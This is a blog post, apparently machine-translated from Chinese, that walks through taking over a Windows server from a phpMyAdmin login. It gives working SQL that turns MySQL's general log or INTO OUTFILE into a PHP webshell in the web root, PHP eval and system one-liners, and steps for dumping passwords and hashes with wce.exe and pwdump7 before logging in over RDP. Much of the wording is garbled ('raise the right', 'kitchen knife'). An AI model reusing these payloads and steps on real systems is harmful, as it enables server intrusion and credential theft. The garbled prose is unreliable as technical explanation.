share your technology and add some temperature for safety

Posted by deaguero at 2020-03-04

Foreword: in the process of penetration test, we learned the account password of phpMyAdmin. How to withdraw the right? Looking down, I'd like to talk to you today about phpMyAdmin's rights.

0x00 definition

PhpMyAdmin is a MySQL database management tool based on PHP and constructed on the website host in the web base mode, which enables the administrator to manage MySQL database with the web interface.

0x01 environment preparation

目标: Windows Server 2003 Enterprise x64 Edition 攻击机: window7 Php:5.45 Mysql: 5.5.53 Apache: 2.4

0x02 start infiltration

We have learned that phpMyAdmin's account password is root root through weak password, explosion, directory disclosure and other channels. Next, we will raise the right through phpMyAdmin, as close to the truth as possible, and talk more about ideas.

A collect useful information

As shown in the figure above, we can get the following useful information.

B. test insertion conditions

We have learned that the default path of the website is e: \ phpstudy \ phptutorial \ www. at this time, we must want to insert a backdoor file or export a shell. If we need to use one of the above two ideas, we must meet the precondition that the value corresponding to "secure file priv" cannot be empty, so we must check the value of "secure file priv" in advance.

PhpMyAdmin executes the following command:

SHOW VARIABLES LIKE "secure_file_priv";

The results are as follows:

It can be seen from the above figure that the value is empty. If we import a sentence at this time, it will definitely fail. Don't believe it, let's try.

The MySQL server is running with the -- secure file priv option so it cannot execute this statement. This is because MySQL has restrictions on file import and export, which is not allowed by default. If the default value is null, it is forbidden. If there is a folder directory, only files under the directory can be changed (neither can the test subdirectory). Let's think about whether we can set its path as our default website path, so that we can import a back door. Let's try.

It is known from the figure that this variable is a read-only variable and cannot be changed dynamically. It should only be changed from the configuration file. We find that we are stuck in a Hutong. That's not the normal way. We can use some ideas to insert a sentence in the log file.

C conversion ideas

The first thing we need to detect is the value of MySQL global variables (general log, general log file).

It can be seen from the figure that the general_log is closed by default, and the location where the log is stored is e: \ phpstudy \ phptutorial \ MySQL \ data \.

First of all, let's understand the function of opening general? Log. Opening it can record every command entered by the user. It will be saved in a log file under E: \ phpstudy \ phptutorial \ MySQL \ data \, which is actually what we often call a log file. Well, the idea of our utilization is to open the general log and change the value of the general log file to a custom PHP file in the default path of our website. Then we write a sentence back to it through the log log, and then use it further.

The specific orders are:

set global general_log = "ON"; SET global general_log_file='E:/phpStudy/PHPTutorial/WWW/infos.php';

Next, we can see the pseudo journal file infos.php we generated under the root path of the website.

Then we'll have to insert a word in the back door.

select '<?php eval($_POST[yumu]);?>';

We can try to use the kitchen knife to connect successfully.

D get administrator password

0x00 get clear text directly

We upload wce.exe to get the clear text password. Lucky thief, get plaintext directly (password with 11 letters and numbers). If you can't get the plaintext directly, you have to go to the second item to get the hash value and decrypt it.

0x01 get hash value

Upload pwdump7.exe to get the hash value and save it in the password.txt file. You can choose to run online to get the hash value. If you can't run, import the rainbow table with ophtrack.

E check whether 3389 is on

Input "netstat - an | find" 3389 "or" netstat - an "directly at the kitchen knife terminal.

I found that 3389 didn't open, but 3390 opened. Let's try to connect.

F. log in to the server

Run mstsc to open the remote desktop.

Enter the account and password obtained above and log in successfully.

It must be clear at last, but I won't write here. There are many thieves in the content

0x03 extension

As shown above, if the value of secure file priv is empty, what should we do if secure file priv is not empty?

A configure my.ini file (does not correspond to the site root path)

Open mysq's configuration file my.ini, set the value of secure ﹣ file ﹣ priv, and restart mysql.

secure_file_priv =  "E:/phpStudy/PHPTutorial/MYSQL/"

Try to change the value and find that it's only readable, not writable. In that case, we can't write one sentence to our website root directory because it limits the export path.

Bconfigure my.ini file (corresponding to the site root path)

Open mysq's configuration file my.ini, set the value of secure ﹣ file ﹣ priv, and restart mysql.

secure_file_priv =  "E:/phpStudy/PHPTutorial/WWW/"

Then we try to insert a sentence back door and insert it successfully.

Two words do not say kitchen knife connection.

Of course, a sentence can be inserted like this.

CREATE TABLE `mysql`.`informationes` (`inform` TEXT NOT NULL); INSERT INTO `mysql`.`informationes` (`inform`) VALUES ('<?php @eval($_POST[pass]);?>'); SELECT `inform` from `mysql`.`informationes` into outfile 'e:/phpStudy/PHPTutorial/WWW/infos.php'; DROP table if exists `mysql`.`informationes`; (注意: c:/phpStudy/PHPTutorial/WWW/为网站的绝对路径)

C export the PHP file of shell with command permission

select '<?php echo \'<pre>\';system($_POST[\'yumu\']);echo \'</pre>\';?>' into outfile 'c:/phpStudy/PHPTutorial/WWW/test.php';

0x04 summary

The environment in this paper is to be close to the real environment as much as possible except for the WAF, and to simulate the real environment to analyze and explain ideas for you, hoping that you can get something.